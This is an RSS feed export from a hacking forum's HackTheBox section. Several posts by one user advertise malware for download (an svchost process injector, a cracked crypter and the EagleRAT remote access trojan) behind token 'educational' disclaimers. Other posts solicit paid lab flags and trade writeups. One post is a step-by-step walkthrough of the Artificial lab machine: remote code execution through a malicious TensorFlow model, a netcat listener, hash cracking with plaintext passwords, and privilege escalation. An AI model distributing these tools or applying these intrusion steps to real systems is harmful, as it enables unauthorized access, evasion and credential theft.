
 <?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/">
	<channel>
		<title><![CDATA[BreachForums - HackTheBox]]></title>
		<link>https://breachforums.rs/</link>
		<description><![CDATA[BreachForums - https://breachforums.rs]]></description>
		<pubDate>Sat, 09 May 2026 00:17:50 +0000</pubDate>
		<generator>MyBB</generator>
		<item>
			<title><![CDATA[SVCHOST Injector 2026]]></title>
			<link>https://breachforums.rs/Thread-SVCHOST-Injector-2026</link>
			<pubDate>Thu, 07 May 2026 21:41:13 +0800</pubDate>
			<dc:creator><![CDATA[<a href="https://breachforums.rs/member.php?action=profile&uid=672913">opsecmaster67</a>]]></dc:creator>
			<guid isPermaLink="false">https://breachforums.rs/Thread-SVCHOST-Injector-2026</guid>
			<description><![CDATA[[center]https://myhackbox.com/wp-content/uploads/2026/04/1-7.webp[/center]<br />
<br />
[center]<span style="font-weight: bold;" class="mycode_b">=7SVCHOST Injector 2026</span>[/center]<br />
<br />
[center]<br />
<br />
SVCHOST Injector 2026<br />
<br />
The term SVCHOST Injector 2026 has recently gained attention in cybersecurity discussions. It refers to a category of techniques where malicious actors attempt to exploit the legitimate Windows process svchost.exe for unauthorized activities.<br />
<br />
In modern operating systems, svchost.exe is a critical system component responsible for running multiple services. Because of its trusted nature, attackers often target it to hide malicious operations and evade detection.<br />
<br />
This article explores the concept from a defensive and educational perspective, helping users understand risks and strengthen system security.<br />
<br />
What is svchost.exe?<br />
Understanding the Core Process<br />
svchost.exe (Service Host) is a legitimate Windows process that:<br />
<br />
Hosts multiple Windows services<br />
Manages background operations<br />
Optimizes system resource usage<br />
Key Characteristics:<br />
Runs multiple instances simultaneously<br />
Essential for system stability<br />
Located in C:\Windows\System32<br />
Because it is always running, it becomes a prime target for misuse.<br />
<br />
 What Does “SVCHOST Injector 2026” Mean?<br />
Threat Perspective<br />
“SVCHOST Injector 2026” typically refers to modern malware techniques that:<br />
<br />
Inject malicious code into svchost.exe<br />
Hide malicious processes under legitimate names<br />
Bypass antivirus detection mechanisms<br />
Maintain persistence within the system<br />
Why Attackers Use svchost.exe:<br />
Trusted by Windows OS<br />
Difficult to distinguish from normal processes<br />
Runs with elevated privileges<br />
<br />
<br />
[center]https://myhackbox.com/wp-content/uploads/2026/04/2-9.webp[/center]<br />
<br />
=7<a href="https://mega.nz/file/yppy0KCT#RNV2cp7hmxrnMMobJWSExiSLz28eux966sWSVtr_BaM" target="_blank" rel="noopener" class="mycode_url">Download Link </a><br />
<br />
[/center]<br />
<br />
<br />
<br />
=7<a href="https://www.mediafire.com/file/56sazpdc16f7d84/SVCHOST+Injector+2026+by+Blackwolf.zip/file" target="_blank" rel="noopener" class="mycode_url">Download Link </a><br />
<br />
[/center]<br />
<br />
<br />
<br />
=7<a href="https://mega.nz/file/yppy0KCT#RNV2cp7hmxrnMMobJWSExiSLz28eux966sWSVtr_BaM" target="_blank" rel="noopener" class="mycode_url">Download Link </a><br />
<br />
[/center]]]></description>
			<content:encoded><![CDATA[[center]https://myhackbox.com/wp-content/uploads/2026/04/1-7.webp[/center]<br />
<br />
[center]<span style="font-weight: bold;" class="mycode_b">=7SVCHOST Injector 2026</span>[/center]<br />
<br />
[center]<br />
<br />
SVCHOST Injector 2026<br />
<br />
The term SVCHOST Injector 2026 has recently gained attention in cybersecurity discussions. It refers to a category of techniques where malicious actors attempt to exploit the legitimate Windows process svchost.exe for unauthorized activities.<br />
<br />
In modern operating systems, svchost.exe is a critical system component responsible for running multiple services. Because of its trusted nature, attackers often target it to hide malicious operations and evade detection.<br />
<br />
This article explores the concept from a defensive and educational perspective, helping users understand risks and strengthen system security.<br />
<br />
What is svchost.exe?<br />
Understanding the Core Process<br />
svchost.exe (Service Host) is a legitimate Windows process that:<br />
<br />
Hosts multiple Windows services<br />
Manages background operations<br />
Optimizes system resource usage<br />
Key Characteristics:<br />
Runs multiple instances simultaneously<br />
Essential for system stability<br />
Located in C:\Windows\System32<br />
Because it is always running, it becomes a prime target for misuse.<br />
<br />
 What Does “SVCHOST Injector 2026” Mean?<br />
Threat Perspective<br />
“SVCHOST Injector 2026” typically refers to modern malware techniques that:<br />
<br />
Inject malicious code into svchost.exe<br />
Hide malicious processes under legitimate names<br />
Bypass antivirus detection mechanisms<br />
Maintain persistence within the system<br />
Why Attackers Use svchost.exe:<br />
Trusted by Windows OS<br />
Difficult to distinguish from normal processes<br />
Runs with elevated privileges<br />
<br />
<br />
[center]https://myhackbox.com/wp-content/uploads/2026/04/2-9.webp[/center]<br />
<br />
=7<a href="https://mega.nz/file/yppy0KCT#RNV2cp7hmxrnMMobJWSExiSLz28eux966sWSVtr_BaM" target="_blank" rel="noopener" class="mycode_url">Download Link </a><br />
<br />
[/center]<br />
<br />
<br />
<br />
=7<a href="https://www.mediafire.com/file/56sazpdc16f7d84/SVCHOST+Injector+2026+by+Blackwolf.zip/file" target="_blank" rel="noopener" class="mycode_url">Download Link </a><br />
<br />
[/center]<br />
<br />
<br />
<br />
=7<a href="https://mega.nz/file/yppy0KCT#RNV2cp7hmxrnMMobJWSExiSLz28eux966sWSVtr_BaM" target="_blank" rel="noopener" class="mycode_url">Download Link </a><br />
<br />
[/center]]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Cold Seal 5.6 cracked Sensitive information can be exposed or stolen]]></title>
			<link>https://breachforums.rs/Thread-Cold-Seal-5-6-cracked-Sensitive-information-can-be-exposed-or-stolen</link>
			<pubDate>Thu, 07 May 2026 21:38:31 +0800</pubDate>
			<dc:creator><![CDATA[<a href="https://breachforums.rs/member.php?action=profile&uid=672913">opsecmaster67</a>]]></dc:creator>
			<guid isPermaLink="false">https://breachforums.rs/Thread-Cold-Seal-5-6-cracked-Sensitive-information-can-be-exposed-or-stolen</guid>
			<description><![CDATA[[center]https://tse2.mm.bing.net/th/id/OIP.w1Z_31WHtXqwDuSHckXaHgHaE-?rs=1&amp;amp;pid=ImgDetMain&amp;amp;o=7&amp;amp;rm=3[/center]<br />
<br />
[center]https://tse4.mm.bing.net/th/id/OIP.4yMzut9DcT0rpcD7jdsEbgHaEK?w=1280&amp;amp;h=720&amp;amp;rs=1&amp;amp;pid=ImgDetMain&amp;amp;o=7&amp;amp;rm=3[/center]<br />
<br />
[center]<span style="font-weight: bold;" class="mycode_b">=7Cold Seal 5.6 cracked</span>[/center]<br />
<br />
[center]<br />
<br />
Cold Seal 5.6 cracked<br />
Using unauthorized versions may seem tempting, but it comes with serious consequences:<br />
<br />
 Malware Infections – Many cracked files contain hidden viruses or spyware<br />
 Data Theft – Sensitive information can be exposed or stolen<br />
 Legal Issues – Violates copyright and software licensing laws<br />
 No Updates – You miss out on security patches and improvements<br />
 System Damage – Can corrupt files or slow down your device<br />
For professionals like you—especially working in cybersecurity and digital media—these risks are not worth it.<br />
Reliability<br />
Official software ensures stable performance without unexpected crashes.<br />
<br />
Security Assurance<br />
You stay protected from malicious code and vulnerabilities.<br />
<br />
 Customer Support<br />
Access to official help, documentation, and troubleshooting.<br />
<br />
 Professional Credibility<br />
Using licensed tools builds trust with clients and partners.<br />
<br />
<br />
[center]https://tse4.mm.bing.net/th/id/OIP.nHYhNh4Gkw44qP6qz2wv4AHaEK?w=1280&amp;amp;h=720&amp;amp;rs=1&amp;amp;pid=ImgDetMain&amp;amp;o=7&amp;amp;rm=3[/center]<br />
<br />
[center]https://tse3.mm.bing.net/th/id/OIP.Iq9ZVmwYDxUkq_Q9rtc_bwHaEK?w=1280&amp;amp;h=720&amp;amp;rs=1&amp;amp;pid=ImgDetMain&amp;amp;o=7&amp;amp;rm=3[/center]<br />
<br />
=7<a href="https://www.mediafire.com/file/l8ac0cy4hu9qvir/ColdSeal+5.6+cracked+by+blackwolf.rar/file" target="_blank" rel="noopener" class="mycode_url">Download Link </a><br />
<br />
[/center]<br />
<br />
=7<a href="https://mega.nz/file/31J3BKja#EnkX3GR_3xLEbPIhSUPa6Pjn9VFnTRs0w4CuEimLgiE" target="_blank" rel="noopener" class="mycode_url">Download Link </a><br />
<br />
[/center]<br />
<br />
=7<a href="https://mega.nz/file/31J3BKja#EnkX3GR_3xLEbPIhSUPa6Pjn9VFnTRs0w4CuEimLgiE" target="_blank" rel="noopener" class="mycode_url">Download Link </a><br />
<br />
[/center]<br />
<br />
<br />
<a href="https://www.virustotal.com/gui/url/7386aee1905bfb19e8571638d290e3f1cacc8bace75decfe69aae64a63090633?nocache=1" target="_blank" rel="noopener" class="mycode_url">https://www.virustotal.com/gui/url/7386a...?nocache=1</a>]]></description>
			<content:encoded><![CDATA[[center]https://tse2.mm.bing.net/th/id/OIP.w1Z_31WHtXqwDuSHckXaHgHaE-?rs=1&amp;amp;pid=ImgDetMain&amp;amp;o=7&amp;amp;rm=3[/center]<br />
<br />
[center]https://tse4.mm.bing.net/th/id/OIP.4yMzut9DcT0rpcD7jdsEbgHaEK?w=1280&amp;amp;h=720&amp;amp;rs=1&amp;amp;pid=ImgDetMain&amp;amp;o=7&amp;amp;rm=3[/center]<br />
<br />
[center]<span style="font-weight: bold;" class="mycode_b">=7Cold Seal 5.6 cracked</span>[/center]<br />
<br />
[center]<br />
<br />
Cold Seal 5.6 cracked<br />
Using unauthorized versions may seem tempting, but it comes with serious consequences:<br />
<br />
 Malware Infections – Many cracked files contain hidden viruses or spyware<br />
 Data Theft – Sensitive information can be exposed or stolen<br />
 Legal Issues – Violates copyright and software licensing laws<br />
 No Updates – You miss out on security patches and improvements<br />
 System Damage – Can corrupt files or slow down your device<br />
For professionals like you—especially working in cybersecurity and digital media—these risks are not worth it.<br />
Reliability<br />
Official software ensures stable performance without unexpected crashes.<br />
<br />
Security Assurance<br />
You stay protected from malicious code and vulnerabilities.<br />
<br />
 Customer Support<br />
Access to official help, documentation, and troubleshooting.<br />
<br />
 Professional Credibility<br />
Using licensed tools builds trust with clients and partners.<br />
<br />
<br />
[center]https://tse4.mm.bing.net/th/id/OIP.nHYhNh4Gkw44qP6qz2wv4AHaEK?w=1280&amp;amp;h=720&amp;amp;rs=1&amp;amp;pid=ImgDetMain&amp;amp;o=7&amp;amp;rm=3[/center]<br />
<br />
[center]https://tse3.mm.bing.net/th/id/OIP.Iq9ZVmwYDxUkq_Q9rtc_bwHaEK?w=1280&amp;amp;h=720&amp;amp;rs=1&amp;amp;pid=ImgDetMain&amp;amp;o=7&amp;amp;rm=3[/center]<br />
<br />
=7<a href="https://www.mediafire.com/file/l8ac0cy4hu9qvir/ColdSeal+5.6+cracked+by+blackwolf.rar/file" target="_blank" rel="noopener" class="mycode_url">Download Link </a><br />
<br />
[/center]<br />
<br />
=7<a href="https://mega.nz/file/31J3BKja#EnkX3GR_3xLEbPIhSUPa6Pjn9VFnTRs0w4CuEimLgiE" target="_blank" rel="noopener" class="mycode_url">Download Link </a><br />
<br />
[/center]<br />
<br />
=7<a href="https://mega.nz/file/31J3BKja#EnkX3GR_3xLEbPIhSUPa6Pjn9VFnTRs0w4CuEimLgiE" target="_blank" rel="noopener" class="mycode_url">Download Link </a><br />
<br />
[/center]<br />
<br />
<br />
<a href="https://www.virustotal.com/gui/url/7386aee1905bfb19e8571638d290e3f1cacc8bace75decfe69aae64a63090633?nocache=1" target="_blank" rel="noopener" class="mycode_url">https://www.virustotal.com/gui/url/7386a...?nocache=1</a>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[EagleRAT v2.5 Create backdoor access points]]></title>
			<link>https://breachforums.rs/Thread-EagleRAT-v2-5-Create-backdoor-access-points</link>
			<pubDate>Thu, 07 May 2026 21:37:14 +0800</pubDate>
			<dc:creator><![CDATA[<a href="https://breachforums.rs/member.php?action=profile&uid=672913">opsecmaster67</a>]]></dc:creator>
			<guid isPermaLink="false">https://breachforums.rs/Thread-EagleRAT-v2-5-Create-backdoor-access-points</guid>
			<description><![CDATA[[center]https://th.bing.com/th/id/R.0177f8c4943c49f8f6d42eb2baee9570?rik=ob9ueJ9TIWDGcw&amp;amp;riu=http%3a%2f%2feaglerat.weebly.com%2fuploads%2f2%2f6%2f3%2f6%2f26366556%2f4317251_orig.png&amp;amp;ehk=dT7FbF3wefMw%2fkh8Ko7qAuf9vqA5IOLgzBNCUxm6Ntg%3d&amp;amp;risl=&amp;amp;pid=ImgRaw&amp;amp;r=0[/center]<br />
<br />
[center]https://i.ytimg.com/vi/gVQD_tOvlsI/maxresdefault.jpg?sqp=-oaymwEmCIAKENAF8quKqQMa8AEB-AH-CYAC0AWKAgwIABABGGUgZShlMA8=&amp;amp;rs=AOn4CLCSLvZywlS9nKMQLs7y7ng2AXywlQ[/center]<br />
<br />
[center]<span style="font-weight: bold;" class="mycode_b">=7EagleRAT v2.5</span>[/center]<br />
<br />
[center]<br />
<br />
EagleRAT v2.5<br />
EagleRAT v2.5 is a term commonly discussed in cybersecurity research circles to describe a Remote Access Trojan (RAT) family observed in threat analysis reports. RATs are malicious programs designed to give unauthorized remote control of a system. This article explains EagleRAT strictly for educational, defensive, and awareness purposes, helping users and organizations understand how such threats are identified and mitigated.<br />
What Is Eagle_RAT?<br />
 EagleRAT refers to a remote access malware variant that attackers may use to monitor or control compromised systems without user consent.<br />
<br />
 Key Characteristics<br />
 Operates silently in the background<br />
 Focuses on unauthorized remote access<br />
 Commonly detected through behavioral analysis<br />
 Communicates with command infrastructure<br />
 Eagle_RAT v2.5 – General Behavior Overview<br />
 From an analytical perspective, EagleRAT v2.5 is associated with:<br />
<br />
 Persistent execution mechanisms<br />
 Interaction with system resources<br />
 Regular background activity<br />
 Evasion-focused design traits<br />
 These behaviors are studied by security teams to improve detection and prevention.<br />
<br />
 Why Eagle_RAT Is Considered a Security Risk<br />
 Any RAT, including EagleRAT, poses risks because it may:<br />
<br />
 Bypass user privacy<br />
 Access sensitive data<br />
 Monitor system activity<br />
 Create backdoor access points<br />
Understanding these risks helps organizations strengthen cybersecurity defenses.<br />
<br />
<br />
Contact for More Premium Tool : <a href="https://t.me/blackwolfreborn" target="_blank" rel="noopener" class="mycode_url">https://t.me/blackwolfreborn</a><br />
<br />
[center]https://th.bing.com/th/id/R.e41252043b7e6f6942707ce079efd118?rik=wKtSddYRrySP0Q&amp;amp;riu=http%3a%2f%2feaglerat.weebly.com%2fuploads%2f2%2f6%2f3%2f6%2f26366556%2f4228321_orig.png&amp;amp;ehk=kiPdRVKQwrfKBznBkm37%2b0DlGl8HksXAbOtc5tDHpuw%3d&amp;amp;risl=&amp;amp;pid=ImgRaw&amp;amp;r=0[/center]<br />
<br />
[center]https://th.bing.com/th/id/R.a5467f27e1985ebb4bc63fa227db199c?rik=Wmib1%2bgWZ2uCOw&amp;amp;riu=http%3a%2f%2feaglerat.weebly.com%2fuploads%2f2%2f6%2f3%2f6%2f26366556%2f1098171_orig.png&amp;amp;ehk=Wh6HBvVjJWtgNMu24vVO7xs4nFSqBVy5natGt18yRnw%3d&amp;amp;risl=&amp;amp;pid=ImgRaw&amp;amp;r=0[/center]<br />
<br />
=7<a href="https://www.mediafire.com/file/fy8lr2ravymjyyk/EagleRAT_v2.5_by_Blackwolf.rar/file" target="_blank" rel="noopener" class="mycode_url">Download Link </a><br />
<br />
[/center]<br />
<br />
=7<a href="https://mega.nz/file/IYtUUbJZ#TJPgOvoxdtsroQfTtWa3Ce_gaLcSYI4lssIXWv4aiac" target="_blank" rel="noopener" class="mycode_url">Download Link </a><br />
<br />
[/center]<br />
<br />
=7<a href="https://www.mirrored.to/files/17F6C126/EagleRAT_v2.5_by_Blackwolf.rar_links" target="_blank" rel="noopener" class="mycode_url">Download Link </a><br />
<br />
[/center]<br />
<br />
<a href="https://www.virustotal.com/gui/file/922b1ca25d87aa2a093607fed159403719eeba8b80d5e1397d71ee2f93595697?nocache=1" target="_blank" rel="noopener" class="mycode_url">https://www.virustotal.com/gui/file/922b...?nocache=1</a>]]></description>
			<content:encoded><![CDATA[[center]https://th.bing.com/th/id/R.0177f8c4943c49f8f6d42eb2baee9570?rik=ob9ueJ9TIWDGcw&amp;amp;riu=http%3a%2f%2feaglerat.weebly.com%2fuploads%2f2%2f6%2f3%2f6%2f26366556%2f4317251_orig.png&amp;amp;ehk=dT7FbF3wefMw%2fkh8Ko7qAuf9vqA5IOLgzBNCUxm6Ntg%3d&amp;amp;risl=&amp;amp;pid=ImgRaw&amp;amp;r=0[/center]<br />
<br />
[center]https://i.ytimg.com/vi/gVQD_tOvlsI/maxresdefault.jpg?sqp=-oaymwEmCIAKENAF8quKqQMa8AEB-AH-CYAC0AWKAgwIABABGGUgZShlMA8=&amp;amp;rs=AOn4CLCSLvZywlS9nKMQLs7y7ng2AXywlQ[/center]<br />
<br />
[center]<span style="font-weight: bold;" class="mycode_b">=7EagleRAT v2.5</span>[/center]<br />
<br />
[center]<br />
<br />
EagleRAT v2.5<br />
EagleRAT v2.5 is a term commonly discussed in cybersecurity research circles to describe a Remote Access Trojan (RAT) family observed in threat analysis reports. RATs are malicious programs designed to give unauthorized remote control of a system. This article explains EagleRAT strictly for educational, defensive, and awareness purposes, helping users and organizations understand how such threats are identified and mitigated.<br />
What Is Eagle_RAT?<br />
 EagleRAT refers to a remote access malware variant that attackers may use to monitor or control compromised systems without user consent.<br />
<br />
 Key Characteristics<br />
 Operates silently in the background<br />
 Focuses on unauthorized remote access<br />
 Commonly detected through behavioral analysis<br />
 Communicates with command infrastructure<br />
 Eagle_RAT v2.5 – General Behavior Overview<br />
 From an analytical perspective, EagleRAT v2.5 is associated with:<br />
<br />
 Persistent execution mechanisms<br />
 Interaction with system resources<br />
 Regular background activity<br />
 Evasion-focused design traits<br />
 These behaviors are studied by security teams to improve detection and prevention.<br />
<br />
 Why Eagle_RAT Is Considered a Security Risk<br />
 Any RAT, including EagleRAT, poses risks because it may:<br />
<br />
 Bypass user privacy<br />
 Access sensitive data<br />
 Monitor system activity<br />
 Create backdoor access points<br />
Understanding these risks helps organizations strengthen cybersecurity defenses.<br />
<br />
<br />
Contact for More Premium Tool : <a href="https://t.me/blackwolfreborn" target="_blank" rel="noopener" class="mycode_url">https://t.me/blackwolfreborn</a><br />
<br />
[center]https://th.bing.com/th/id/R.e41252043b7e6f6942707ce079efd118?rik=wKtSddYRrySP0Q&amp;amp;riu=http%3a%2f%2feaglerat.weebly.com%2fuploads%2f2%2f6%2f3%2f6%2f26366556%2f4228321_orig.png&amp;amp;ehk=kiPdRVKQwrfKBznBkm37%2b0DlGl8HksXAbOtc5tDHpuw%3d&amp;amp;risl=&amp;amp;pid=ImgRaw&amp;amp;r=0[/center]<br />
<br />
[center]https://th.bing.com/th/id/R.a5467f27e1985ebb4bc63fa227db199c?rik=Wmib1%2bgWZ2uCOw&amp;amp;riu=http%3a%2f%2feaglerat.weebly.com%2fuploads%2f2%2f6%2f3%2f6%2f26366556%2f1098171_orig.png&amp;amp;ehk=Wh6HBvVjJWtgNMu24vVO7xs4nFSqBVy5natGt18yRnw%3d&amp;amp;risl=&amp;amp;pid=ImgRaw&amp;amp;r=0[/center]<br />
<br />
=7<a href="https://www.mediafire.com/file/fy8lr2ravymjyyk/EagleRAT_v2.5_by_Blackwolf.rar/file" target="_blank" rel="noopener" class="mycode_url">Download Link </a><br />
<br />
[/center]<br />
<br />
=7<a href="https://mega.nz/file/IYtUUbJZ#TJPgOvoxdtsroQfTtWa3Ce_gaLcSYI4lssIXWv4aiac" target="_blank" rel="noopener" class="mycode_url">Download Link </a><br />
<br />
[/center]<br />
<br />
=7<a href="https://www.mirrored.to/files/17F6C126/EagleRAT_v2.5_by_Blackwolf.rar_links" target="_blank" rel="noopener" class="mycode_url">Download Link </a><br />
<br />
[/center]<br />
<br />
<a href="https://www.virustotal.com/gui/file/922b1ca25d87aa2a093607fed159403719eeba8b80d5e1397d71ee2f93595697?nocache=1" target="_blank" rel="noopener" class="mycode_url">https://www.virustotal.com/gui/file/922b...?nocache=1</a>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[[FREE] HackTheBox All Cheatsheets]]></title>
			<link>https://breachforums.rs/Thread-FREE-HackTheBox-All-Cheatsheets</link>
			<pubDate>Mon, 27 Apr 2026 20:37:06 +0800</pubDate>
			<dc:creator><![CDATA[<a href="https://breachforums.rs/member.php?action=profile&uid=793">Tamarisk</a>]]></dc:creator>
			<guid isPermaLink="false">https://breachforums.rs/Thread-FREE-HackTheBox-All-Cheatsheets</guid>
			<description><![CDATA[Hi,<br />
I just share this with you cheatsheets dumped from <a href="https://www.hackthebox.com/cybersecurity-resources/cheatsheets" target="_blank" rel="noopener" class="mycode_url">https://www.hackthebox.com/cybersecurity...heatsheets</a>, if it's down let me know:<br />
<div style="text-align: center;" class="mycode_align">
<div class="hidden-content rounded" style="border-radius: 8px; overflow: hidden;">
    <div class="hidden-content__title">
      <span class="hidden-content__custom-title">Hidden Content</span><i class="fa fa-eye" style="float:right; color:var(--theme-secondary-color);"></i><br />
    </div>
    <div class="hidden-content__main">You must <a href="https://breachforums.rs/member.php?action=register">register</a> or <a href="https://breachforums.rs/member.php?action=login">login</a> to view this content.</div>
  </div>
</div>
Enjoy!]]></description>
			<content:encoded><![CDATA[Hi,<br />
I just share this with you cheatsheets dumped from <a href="https://www.hackthebox.com/cybersecurity-resources/cheatsheets" target="_blank" rel="noopener" class="mycode_url">https://www.hackthebox.com/cybersecurity...heatsheets</a>, if it's down let me know:<br />
<div style="text-align: center;" class="mycode_align">
<div class="hidden-content rounded" style="border-radius: 8px; overflow: hidden;">
    <div class="hidden-content__title">
      <span class="hidden-content__custom-title">Hidden Content</span><i class="fa fa-eye" style="float:right; color:var(--theme-secondary-color);"></i><br />
    </div>
    <div class="hidden-content__main">You must <a href="https://breachforums.rs/member.php?action=register">register</a> or <a href="https://breachforums.rs/member.php?action=login">login</a> to view this content.</div>
  </div>
</div>
Enjoy!]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Looking for a few insane challenge flags]]></title>
			<link>https://breachforums.rs/Thread-Looking-for-a-few-insane-challenge-flags</link>
			<pubDate>Sun, 26 Apr 2026 04:39:25 +0800</pubDate>
			<dc:creator><![CDATA[<a href="https://breachforums.rs/member.php?action=profile&uid=672413">cuteprincess</a>]]></dc:creator>
			<guid isPermaLink="false">https://breachforums.rs/Thread-Looking-for-a-few-insane-challenge-flags</guid>
			<description><![CDATA[Looking for a few insane HTB flags:<br />
<br />
ShadowStreamSherlock<br />
Heapify<br />
NFTDRM<br />
Blinded<br />
Sandcastle<br />
<br />
Please let me know by sending me a DM. I will pay.]]></description>
			<content:encoded><![CDATA[Looking for a few insane HTB flags:<br />
<br />
ShadowStreamSherlock<br />
Heapify<br />
NFTDRM<br />
Blinded<br />
Sandcastle<br />
<br />
Please let me know by sending me a DM. I will pay.]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[HTB CPTS - Hints / Writeup Trade for CRTP Writeup]]></title>
			<link>https://breachforums.rs/Thread-HTB-CPTS-Hints-Writeup-Trade-for-CRTP-Writeup</link>
			<pubDate>Mon, 20 Apr 2026 18:31:05 +0800</pubDate>
			<dc:creator><![CDATA[<a href="https://breachforums.rs/member.php?action=profile&uid=672423">kakoito11</a>]]></dc:creator>
			<guid isPermaLink="false">https://breachforums.rs/Thread-HTB-CPTS-Hints-Writeup-Trade-for-CRTP-Writeup</guid>
			<description><![CDATA[anyone wants trade CRTP for hackthebox CPTS? or any free hints on WKS01 ? flag6]]></description>
			<content:encoded><![CDATA[anyone wants trade CRTP for hackthebox CPTS? or any free hints on WKS01 ? flag6]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[SUMMUS: Extreme Red Teamer Lab]]></title>
			<link>https://breachforums.rs/Thread-SUMMUS-Extreme-Red-Teamer-Lab</link>
			<pubDate>Tue, 10 Feb 2026 23:37:16 +0800</pubDate>
			<dc:creator><![CDATA[<a href="https://breachforums.rs/member.php?action=profile&uid=231986">f4k3h4ck3r</a>]]></dc:creator>
			<guid isPermaLink="false">https://breachforums.rs/Thread-SUMMUS-Extreme-Red-Teamer-Lab</guid>
			<description><![CDATA[Has anyone done then the <span style="font-weight: bold;" class="mycode_b">SUMMUS: Extreme Red Teamer Lab</span>?<br />
<br />
Can anyone share writeup?]]></description>
			<content:encoded><![CDATA[Has anyone done then the <span style="font-weight: bold;" class="mycode_b">SUMMUS: Extreme Red Teamer Lab</span>?<br />
<br />
Can anyone share writeup?]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[HTB - ARTIFICIAL.HTB - EASY LINUX]]></title>
			<link>https://breachforums.rs/Thread-HTB-ARTIFICIAL-HTB-EASY-LINUX</link>
			<pubDate>Tue, 10 Feb 2026 22:12:52 +0800</pubDate>
			<dc:creator><![CDATA[<a href="https://breachforums.rs/member.php?action=profile&uid=372312">chain</a>]]></dc:creator>
			<guid isPermaLink="false">https://breachforums.rs/Thread-HTB-ARTIFICIAL-HTB-EASY-LINUX</guid>
			<description><![CDATA[ARTIFICIAL - HACKTHEBOX<br />
LINUX - EASY<br />
IP: 10.10.11.74 <br />
dn: artificial.htb<br />
<br />
Initial access<br />
---------------------------------------<br />
Vuln: <a href="https://splint.gitbook.io/cyberblog/security-research/tersorflow-remote-code-execution-with-malicious-model" target="_blank" rel="noopener" class="mycode_url">https://splint.gitbook.io/cyberblog/secu...ious-model</a><br />
Webapp allows uploading TensorFlow H5 models - executes Lambda layer code during inference<br />
<br />
exploit.py: <a href="https://pastebin.com/cWyDqzv0" target="_blank" rel="noopener" class="mycode_url">https://pastebin.com/cWyDqzv0</a> (waf block the code)<br />
<br />
Build exploit (must be in docker or right env):<br />
<br />
docker run -it --rm \<br />
-v "&#36;PWD":/workspace \<br />
-w /workspace \<br />
tensorflow/tensorflow:2.13.0 python3 exploit.py<br />
<br />
Execute:<br />
# Listener<br />
nc -lvnp 1337<br />
<br />
# Upload exploit.h5 via web interface<br />
# Click "Show Prediction" to trigger payload<br />
# Shell as uid-100 (app group)<br />
<br />
DB Creds extract<br />
-------------------<br />
Find SQLite DB:<br />
find . -name "*.db" 2&gt;/dev/null<br />
sqlite3 users.db<br />
.tables<br />
SE/LECT * FR/OM user; (REMOVE THE SLASH, WAF BLOCK ME)<br />
<br />
Extracted hashes:<br />
gael:c99175974b6e192936d97224638a34f8<br />
mark:0f3d8c76530022670f1c6029eed09ccb<br />
robert:b606c5f5136170f15444251665638b36<br />
royer:bc25b1f80f544c0ab451c02a3dca9fc6<br />
mary:bf041041e57f1aff3be7ea1abd6129d0<br />
<br />
Crack with john:<br />
john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-md5 hashes.txt<br />
<br />
Cracked:<br />
gael:mattp005numbertwo<br />
royer:marwinnarak043414036<br />
<br />
SSH Access<br />
------------------<br />
ssh gael@artificial.htb<br />
password: mattp005numbertwo<br />
cat user.txt<br />
<br />
Port discover <br />
--------------<br />
netstat -tlnp | grep 127.0.0.1<br />
Found port 9898 on 127.0.0.1 LISTEN<br />
<br />
Port forwarding:<br />
ssh -L 9898:127.0.0.1:9898 gael@artificial.htb<br />
<br />
BACKREST recon<br />
--------------<br />
Creds already found dont work - need to search for backup on server<br />
<br />
find / -type f -name "*backup*" 2&gt;/dev/null<br />
Found: /var/backups/backrest_backup.tar.gz<br />
<br />
Download and extract backrest_backup.tar.gz:<br />
├── backrest<br />
├── .config<br />
│ └── backrest<br />
│ └── config.json<br />
├── install.sh<br />
├── jwt-secret<br />
├── oplog.sqlite<br />
├── oplog.sqlite.lock<br />
├── oplog.sqlite-shm<br />
├── oplog.sqlite-wal<br />
├── processlogs<br />
│ └── backrest.log<br />
├── restic<br />
└── tasklogs<br />
├── .inprogress<br />
├── logs.sqlite<br />
├── logs.sqlite-shm<br />
└── logs.sqlite-wal<br />
<br />
in config.json:<br />
<br />
"name": "backrest_root",<br />
"passwordBcrypt": "JDJhJDEwJGNWR0l5OVZNWFFkMGdNNWdpbkNtamVpMmtaUi9BQ01Na1Nzc3BiUnV0WVA1OEVCWnovMFFP"<br />
<br />
<br />
Crack bcrypt hash:<br />
echo 'JDJhJDEwJGNWR0l5OVZNWFFkMGdNNWdpbkNtamVpMmtaUi9BQ01Na1Nzc3BiUnV0WVA1OEVCWnovMFFP' | base64 -d &gt; hash.bcrypt<br />
john --wordlist=/usr/share/wordlists/rockyou.txt --format=bcrypt hash.bcrypt<br />
<br />
Password: backrest_root:!@#&#36;%^<br />
<br />
Privesc<br />
------------------------<br />
Backrest access:<br />
URL: <a href="http://localhost:9898" target="_blank" rel="noopener" class="mycode_url">http://localhost:9898</a><br />
Creds: backrest_root / !@#&#36;%^<br />
<br />
Create repo first before creating plan:<br />
Name: test<br />
Type: Local<br />
Path: /tmp<br />
<br />
Create backup plan to grab root.txt:<br />
Name: exploit<br />
Repository: test<br />
Paths: /root/<br />
<br />
Get root.txt:<br />
1. Execute backup via "Backup Now"<br />
2. Wait for green status<br />
3. Click completed backup → "Snapshot Browser"<br />
4. Navigate to /root/root.txt in snapshot browser<br />
5. Restore to /etc/root<br />
6. Download restored file<br />
<br />
Got root.txt flag<br />
(can also get revshell with hook command option in plan)<br />
<br />
Credentials summary (for noob)<br />
-------------------<br />
gael:mattp005numbertwo (SSH)<br />
royer:marwinnarak043414036 (cracked hash)<br />
backrest_root:!@#&#36;%^ (Backrest web interface)]]></description>
			<content:encoded><![CDATA[ARTIFICIAL - HACKTHEBOX<br />
LINUX - EASY<br />
IP: 10.10.11.74 <br />
dn: artificial.htb<br />
<br />
Initial access<br />
---------------------------------------<br />
Vuln: <a href="https://splint.gitbook.io/cyberblog/security-research/tersorflow-remote-code-execution-with-malicious-model" target="_blank" rel="noopener" class="mycode_url">https://splint.gitbook.io/cyberblog/secu...ious-model</a><br />
Webapp allows uploading TensorFlow H5 models - executes Lambda layer code during inference<br />
<br />
